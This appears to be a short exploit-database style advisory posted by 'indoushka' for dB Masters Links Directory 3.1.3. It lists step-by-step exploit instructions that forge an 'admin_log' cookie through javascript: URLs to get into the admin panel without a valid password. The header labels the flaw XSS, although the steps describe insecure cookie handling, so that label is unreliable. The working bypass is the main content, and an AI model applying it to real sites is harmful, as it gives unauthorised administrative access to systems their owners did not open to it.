======================================================================================== | # Title : dB Masters Multimedia Insecure Cookie Handling Vulnerability | | # Author : indoushka | | # email : indoushka@hotmail.com | | # Home : Souk Naamane - 04325 - Oum El Bouaghi - Algeria -(00213771818860) | | # Web Site : www.iq-ty.com | | # Script : Powered by dB Masters Multimedia (dB Masters Links Directory 3.1.3) | | # Tested on: windows SP2 Français V.(Pnx2 2.0) + Lunix Français v.(9.4 Ubuntu) | | # Bug : XSS | ====================== Exploit By indoushka ================================= | # Exploit : | | 1- http://server/links/admin.php | 2- javascript:document.cookie="admin_log=in;path=/"; | login whith the pass "in" | 3- javascript:document.cookie="admin_log=indoushka;path=/"; | login whith out pss | tested in Opera V.10 | ================================ Dz-Ghost Team ======================================== Greetz : all my friend * Dos-Dz * Snakespc * His0k4 * Hussin-X * Str0ke * Saoucha * Star08 | -------------------------------------------------------------------------------------------